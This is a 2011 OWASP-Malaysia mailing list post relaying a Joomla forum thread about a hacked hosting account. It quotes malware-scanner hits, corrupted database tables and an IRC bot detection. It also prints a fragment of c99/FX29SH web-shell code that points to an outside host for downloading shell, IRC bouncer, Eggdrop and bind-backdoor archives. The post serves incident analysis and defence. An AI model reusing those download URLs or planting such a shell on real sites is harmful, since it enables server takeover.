[OWASP-Malaysia] Forum Post : Malware/Maybe Hack Causing Host Server to Get Overload

Harisfazillah Jamel linuxmalaysia at gmail.com
Wed Oct 19 08:00:13 EDT 2011


Team,

A forum post we can refer, what the cracker/s do to our servers.

http://forum.joomla.org/viewtopic.php?p=2518912&sid=1f09664d13627db3131ef72b6cccbc71#p2518912

One of the post

"You also need to remove every file, cron job, sub domains,
directories, etc. from your domain."
"mmmmmmmm, me thought that was done in the first place"

Site was restored from site backups which are infected.

I've downloaded the backups I have from cPanel, unzipped them and
scanned them with Norton anti-virus (I'm on a Mac). I did the same
with the public_HTML folder. The backups had trojans,

Take a closer look at some of the posts. While it is possible that the
server has another account hacked, it is likely originating from this
account. There are several scripts here

an injector script and an uploader script:

HEX}base64.inject.unclassed.3 : ./media/system/cfg.php
{HEX}php.uploader.max.523 : ./media/system/upload.php

Evidence the hacker messed with or has attempted to mess with the database:

hableda1_jo151.jos_session
warning : Table is marked as crashed
warning : 1 client is using or hasn't closed the table properly
warning : Found 1128996 deleted space in delete link chain. Should be 1167464
error : Found 442 deleted rows in delete link chain. Should be 457

hableda1_jo151.jos_content
warning : 1 client is using or hasn't closed the table properly
status : OK
error : record delete-link-chain corrupted
error : Corrupt

Evidence that hacker has installed or linked to c99, and other scripts:

#$sh_mainurl = "http://localhost/FX29SH/";
$sh_mainurl = "http://uaedesign.com/xml/";
$fx29sh_updateurl = $sh_mainurl."c99_update.php";
$fx29sh_sourcesurl = $sh_mainurl."c99.txt";
$sh_sourcez = array(
"Fx29Sh" => array($sh_mainurl."c99.txt","c99.php"),
"psyBNC" => array($sh_mainurl."fx.tgz","fx.tgz"),
"Eggdrop" => array($sh_mainurl."fxb.tgz","fxb.tgz"),
"BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),

Evidence of IRC installed and active:

A few updates: I've downloaded and scanned my backup that was just
generated and this virus was found in the homedir.tar and the
hableda1.tar.gz (I scanned both the zipped and unzipped files):
backdoor.IRC.bot.

Evidence the attempts to use the site for malware/spam/other purposes continue:

There is a lot of POST requests to the index page from the IP address
xxx.xxx.xxx.xxx

These are the reasons I stated what I did as a plan of action.

_______________


We can discuss this at OWASP.my Discussion Group In Facebook

https://www.facebook.com/groups/owaspmy/


More information about the OWASP-Malaysia mailing list